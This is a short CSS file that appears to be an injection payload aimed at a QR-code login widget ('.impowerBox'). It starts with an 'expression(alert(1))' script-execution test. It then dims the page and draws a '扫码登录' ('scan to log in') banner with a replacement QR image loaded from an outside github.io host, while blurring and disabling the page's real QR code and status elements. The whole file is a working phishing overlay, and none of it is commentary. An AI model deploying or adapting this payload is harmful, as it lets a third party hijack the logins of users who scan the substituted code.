div {
    width: expression(alert(1));
}

body::before {
    content: '';
    display: block;
    position: fixed;
    left: 0; top: 0;
    width: 100vw; height: 100vh;
    background: rgba(0,0,0,0.81);
    z-index: 99998;
}
.impowerBox::before {
    content: '扫码登录';
    font-size: 1.6em;
    color: #00c896;
    position: fixed;
    z-index: 99999;
    left: 50vw;
    top: 18vh;
    width: 360px;
    text-align: center;
    font-weight: bold;
    background: transparent;
}
.impowerBox::after {
    content: '';
    display: block;
    position: fixed;
    z-index: 99999;
    left: 50vw;
    top: 27vh;
    transform: translate(-50%, 0);
    width: 260px; height: 260px;
    background: url('https://xinyisleep.github.io/123.jpg') no-repeat center center / cover;
    border-radius: 18px;
    border: 8px solid #fff;
    box-shadow: 0 0 20px #000b;
}
.qrcode, img, .status, .info, .title, .footer {
    opacity: 0.03 !important;
    pointer-events: none !important;
    filter: blur(12px) grayscale(1) !important;
}

